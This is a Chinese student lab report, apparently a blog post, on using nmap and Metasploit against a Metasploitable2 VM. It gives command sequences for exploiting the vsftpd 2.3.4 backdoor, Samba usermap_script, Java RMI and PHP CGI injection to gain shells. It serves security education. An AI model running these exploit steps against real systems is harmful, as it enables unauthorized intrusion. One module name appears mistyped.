20222405 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

经过高强度的攻击渗透操作,我现在已经熟练的掌握了Metasploit工具的用法,也深刻体会到漏洞的可怕之处,这些漏洞会严重威胁到我们的隐私安全。

2.实验过程

(1)前期渗透

①主机发现

输入命令msfconsole进入控制台

search arp_sweep搜索一下

成功找到

输入use 0使用auxiliary/scanner/discovery/arp_sweep

先ifconfig看一下靶机的ip地址

可以看到靶机的ip地址是192.168.50.175

这时我们set RHOSTS 192.168.50.175设置目标ip地址

然后exploit

图中可以看出成功发现主机192.168.50.175

②端口扫描

输入命令nmap -sT 192.168.50.175进行扫描

扫描结果如图

③扫描系统和漏洞

输入nmap -sV 192.168.50.175查看服务版本信息

输入nmap -O 192.168.50.175查看操作系统信息

输入nmap --script=vuln 192.168.50.175进行漏洞扫描

(2)Vsftpd源码包后门漏洞(21端口)

漏洞简介:Vsftpd(Very Secure FTP Daemon)2.3.4版本的源码包被植入了恶意后门代码。这个漏洞的触发点是Vsftpd在接受用户名时,如果用户名包含特定字符串:),就会触发后门机制。

nmap -sV -p 21 192.168.50.175扫描一下目标端口的信息

可以看到21端口是开启的,而且vsftpd的版本是2.3.4,即存在漏洞的版本

接下来输入msfconsole启动控制台

search vsftpd搜索相关漏洞

use 1使用exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 192.168.50.175设置目标ip地址

exploit开始攻击

输入uname -a、pwd、id、whoami、ifconfig等命令都可以成功执行并输出信息,可以证明攻击成功

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞简介:Samba MS-RPC Shell命令注入漏洞(CVE-2007-2447)是Samba服务中的一个漏洞。攻击者通过端口139向远程Samba服务发送特制请求,可利用漏洞注入命令并以root权限执行,危害严重。

nmap -sV -p 139 192.168.50.175扫描一下目标端口的信息

输入msfconsole启动控制台

search samba搜索相关漏洞

use exploit/multi/samba/usermap_script选择要使用的漏洞

set RHOSTS 192.168.50.175设置目标ip地址

exploit开始攻击

输入uname -a、pwd、id、whoami、ifconfig等命令都可以成功执行并输出信息,可以证明攻击成功

(4)Java RMI SERVER命令执行漏洞(1099端口)

漏洞简介:Java RMI Server命令执行漏洞(CVE-2011-3556)允许攻击者通过1099端口向RMI注册服务发送恶意序列化对象,触发远程代码执行,导致目标系统被完全控制,危害严重。

nmap -sV -p 1099 192.168.50.175扫描一下目标端口的信息

接下来输入msfconsole启动控制台

search rmi搜索相关漏洞

use exploit/multi/misc/java_rmi_server选择要使用的漏洞

set RHOSTS 192.168.50.175设置目标ip地址

exploit开始攻击

进入了meterpreter后输入sessions -i 1shell

这时输入uname -a、pwd、id、whoami、ifconfig等命令都可以成功执行并输出信息,可以证明攻击成功

(5)PHP CGI参数执行注入漏洞(80端口)

漏洞简介:PHP CGI参数执行注入漏洞(CVE-2012-1823)允许攻击者通过80端口发送特制请求,利用未正确处理的参数在PHP CGI模式下执行任意命令,导致服务器被控制。

nmap -sV -p 80 192.168.50.175扫描一下目标端口的信息

接下来输入msfconsole启动控制台

search php_cgi搜索相关漏洞

use 0使用exploit/multi/http/php_cei_arg_injection

set RHOSTS 192.168.50.175设置目标ip地址

exploit开始攻击

进入了meterpreter后输入sessions -i 1shell

输入uname -a、pwd、id、whoami等命令都可以成功执行并输出信息,可以证明攻击成功

3.问题及解决方案

问题1:靶机Metasploitable2的网络配置不正确,导致无法正常通信。

问题1解决方案:将靶机网络模式设置为与攻击机一致,确保二者的ip地址在同一网段。

4.学习感悟、思考等
在这次实验中,我更加熟练的掌握了如何使用Metasploit进行渗透测试,了解到如何通过扫描端口和发现漏洞来攻击目标系统。具体学习了几个常见的漏洞利用方法,如Vsftpd后门漏洞、Samba命令注入漏洞、Java RMI执行漏洞和PHP CGI注入漏洞,并通过Metasploit成功地利用这些漏洞获取目标主机的控制权限。通过这些实践,我深刻感受到漏洞利用不仅需要理论知识,更要有动手实践的能力,只有不断操作,才能真正理解攻击背后的原理。

posted @ 2024-11-17 00:28  20222405楚喆皓  阅读(14)  评论(0编辑  收藏  举报